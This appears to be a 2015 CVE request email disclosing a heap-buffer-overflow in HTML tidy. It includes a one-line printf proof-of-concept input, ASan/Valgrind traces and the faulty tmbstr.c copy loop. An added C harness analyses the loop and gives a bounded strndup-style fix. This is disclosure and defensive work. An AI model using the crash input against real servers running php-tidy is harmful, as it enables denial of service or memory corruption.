Date: Thu, 4 Jun 2015 00:50:41 -0500
From: Fernando Muñoz <>
Subject: CVE Request - tidy 0.99 / tidy5 heap-buffer-overflow

Hello,

I'd like to request a CVE ID for the following issue:

tidy [1] is affected by an out-of-bounds write when processing
malformed HTML files.
This issue could be abused in server-side applications that use the
php-tidy extension with user input.

The issue was confirmed, analysed and fixed by the tidy5 maintainer. [2]


$ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d\x66\x3d\x22\x12\x22\xbb" > err.html

An ASan-enabled build of tidy outputs:

$ tidy-asan err.html
==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
WRITE of size 1 at 0xb53006b1 thread T0
    #0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/
    #1 0xb7141060 in prvTidyGetToken (/usr/lib/
    #2 0xb711856e in prvTidyParseDocument (/usr/lib/
    #3 0xb71f2a58 in prvTidyDocParseStream (/usr/lib/
    #4 0xb71f34a5 in tidyParseFile (/usr/lib/
    #5 0x804bfa9 (/usr/bin/tidy+0x804bfa9)
    #6 0xb6edf72d in __libc_start_main (/lib/i386-linux-gnu/
    #7 0x804fa4e (/usr/bin/tidy+0x804fa4e)

0xb53006b1 is located 0 bytes to the right of 1-byte region
allocated by thread T0 here:
    #0 0xb72af18c in __interceptor_malloc
    #1 0xb71c5963 (/usr/lib/

Valgrind with the standard build:

$ valgrind tidy err.html
==30499== Invalid write of size 1
==30499==    at 0x408805C: prvTidytmbstrndup (tmbstr.c:39)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)

==30499== Invalid write of size 1
==30499==    at 0x4088065: prvTidytmbstrndup (tmbstr.c:41)
==30499==    by 0x40738A8: ParseValue (lexer.c:3486)
==30499==    by 0x4075F39: ParseAttrs (lexer.c:3603)
==30499==    by 0x4075F39: GetTokenFromStream (lexer.c:2416)

file: tmbstr.c

39        while ( len-- > 0 &&  (*cp++ = *str++) )
40          /**/;
41        *cp = 0;

Credit: Fernando Muñoz
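Added example, not code from the report above or from the tidy project: a small C harness that measures how many bytes the copy loop quoted from tmbstr.c actually writes for a given (str, len) pair, states the minimum destination capacity in closed form, checks that a 1+len allocation size cannot wrap, and shows a bounded strndup-style helper that sizes its allocation from what it really copies and terminates exactly once. All function names, the scratch-buffer size and the sample inputs are this example's own assumptions.

```c
/* Added example (not tidy's code). Names and the scratch size are assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define SCRATCH 256  /* constructed scratch size; len must stay below it */

/* Same loop as the tmbstr.c excerpt, run into a scratch buffer big enough
   that it cannot overflow here. Returns the number of bytes written, i.e.
   the minimum destination capacity the loop needs for this (str, len). */
size_t loop_write_count(const char *str, size_t len)
{
    char scratch[SCRATCH];
    char *cp = scratch;
    if (len > SCRATCH - 2)
        return 0;  /* outside what this harness can measure safely */
    while (len-- > 0 && (*cp++ = *str++))
        /**/;
    *cp = 0;
    return (size_t)(cp - scratch) + 1;
}

/* strnlen-style helper (own implementation to avoid feature-macro issues):
   length of s, reading at most max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n])
        n++;
    return n;
}

/* Closed form of loop_write_count: min(len, strlen(str) + 1) + 1.
   When the source is shorter than len, the loop stores the NUL, steps past
   it, and the trailing `*cp = 0` stores a second NUL, so strlen + 2 bytes
   are written. When the source has at least len bytes, len + 1 are written,
   so a len-sized allocation is one byte short; a (1 + len)-sized one always
   suffices provided 1 + len does not wrap. */
size_t required_capacity(const char *str, size_t len)
{
    size_t n = bounded_len(str, len);          /* bytes the loop consumes */
    size_t copied = (n < len) ? n + 1 : len;   /* includes the copied NUL */
    return copied + 1;                         /* plus the trailing NUL   */
}

/* Allocation size for a len-byte copy plus terminator; 0 means 1 + len
   would wrap to 0, the tiny-allocation precursor to a heap overflow. */
size_t alloc_size_or_zero(size_t len)
{
    return (len == SIZE_MAX) ? 0 : len + 1;
}

/* Hardened strndup-style helper: never reads past len bytes of str, sizes
   the allocation from the measured length, and terminates once. */
char *bounded_dup(const char *str, size_t len)
{
    size_t n, size;
    char *s;
    if (!str)
        return NULL;
    n = bounded_len(str, len);
    size = alloc_size_or_zero(n);
    if (size == 0)
        return NULL;
    s = malloc(size);
    if (!s)
        return NULL;
    memcpy(s, str, n);
    s[n] = 0;
    return s;
}

/* Test helper: duplicate, compare with the expected string, free. */
bool check_dup(const char *src, size_t len, const char *expected)
{
    char *d = bounded_dup(src, len);
    bool ok = d != NULL && strcmp(d, expected) == 0;
    free(d);
    return ok;
}
```

The measured and closed-form counts agree: for a 3-byte source and len 5 the loop writes 5 bytes (the NUL twice), for len 2 it writes 3, for len 3 it writes 4. The practical consequence for a strndup-style routine is that the destination must be sized from 1 + len, that 1 + len must be checked against wrap-around, and that a caller-supplied len should be clamped by what the source actually holds, as `bounded_dup` does.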

